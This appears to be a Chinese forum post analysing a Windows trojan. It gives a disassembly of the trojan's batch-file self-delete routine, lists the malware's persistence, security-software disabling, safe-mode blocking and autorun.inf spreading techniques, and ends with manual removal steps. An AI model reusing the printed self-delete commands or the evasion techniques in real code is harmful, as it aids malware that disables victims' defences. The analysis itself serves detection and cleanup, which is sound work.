004055A0 |. 68 D0564000 push down.004056D0 ; ASCII "del ""
004055A5 |. FF75 F8 push [local.2]
004055A8 |. 68 E0564000 push down.004056E0
004055AD |. 8D85 20FEFFFF lea eax,[local.120]
004055B3 |. BA 03000000 mov edx,3
004055B8 |. E8 2BE1FFFF call down.004036E8
004055BD |. 8B95 20FEFFFF mov edx,[local.120]
004055C3 |. 8D85 2CFEFFFF lea eax,[local.117]
004055C9 |. E8 EEE3FFFF call down.004039BC
004055CE |. E8 01D6FFFF call down.00402BD4
004055D3 |. E8 A8CFFFFF call down.00402580
004055D8 |. BA EC564000 mov edx,down.004056EC ; ASCII "ping -n 5 127.0.0.1>nul"
004055DD |. 8D85 2CFEFFFF lea eax,[local.117]
004055E3 |. E8 D4E3FFFF call down.004039BC
004055E8 |. E8 E7D5FFFF call down.00402BD4
004055ED |. E8 8ECFFFFF call down.00402580
004055F2 |. 68 0C574000 push down.0040570C ; ASCII "if exist ""
004055F7 |. FF75 F8 push [local.2]
004055FA |. 68 E0564000 push down.004056E0
004055FF |. 68 20574000 push down.00405720 ; ASCII " goto try"
00405604 |. 8D85 1CFEFFFF lea eax,[local.121]
0040560A |. BA 04000000 mov edx,4
0040560F |. E8 D4E0FFFF call down.004036E8
00405614 |. 8B95 1CFEFFFF mov edx,[local.121]
0040561A |. 8D85 2CFEFFFF lea eax,[local.117]
00405620 |. E8 97E3FFFF call down.004039BC
00405625 |. E8 AAD5FFFF call down.00402BD4
0040562A |. E8 51CFFFFF call down.00402580
0040562F |. BA 34574000 mov edx,down.00405734 ; ASCII "del %0"
00405634 |. 8D85 2CFEFFFF lea eax,[local.117]
0040563A |. E8 7DE3FFFF call down.004039BC
0040563F |. E8 90D5FFFF call down.00402BD4
00405644 |. E8 37CFFFFF call down.00402580
00405649 |. 8D85 2CFEFFFF lea eax,[local.117]
0040564F |. E8 20D3FFFF call down.00402974
00405654 |. E8 27CFFFFF call down.00402580
00405659 |. 6A 00 push 0
0040565B |. 8B45 FC mov eax,[local.1]
0040565E |. E8 C5E1FFFF call down.00403828
00405663 |. 50 push eax ; |CmdLine
00405664 |. E8 D3EAFFFF call down.0040413C ; \WinExec
大体流程:
1.获取卷标作为文件名,释放文件修改文件属性。
2.通过修改注册表实现自启动,创建服务实现自启动。
3.修改注册表达到镜像劫持、隐藏特殊属性的文件。
4.打开服务,修改安全服务,使其安全软件失效,屏蔽安全模式,达到穿透还原目的,枚举并修改所有自启动。
5.遍历所有盘符进行autorun感染。
6.通过dll hook进行监视关闭所有安全软件以及防火墙及其驱动。
7.自删除。
本人如有分析不当,请高手多多指教··
查杀方法:
打开XueTr,转到自启动删除,服务启动项删除,
删除C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dll和4634ED47.dat
删除每个盘符autorun.inf以及生成的dll文件
|
|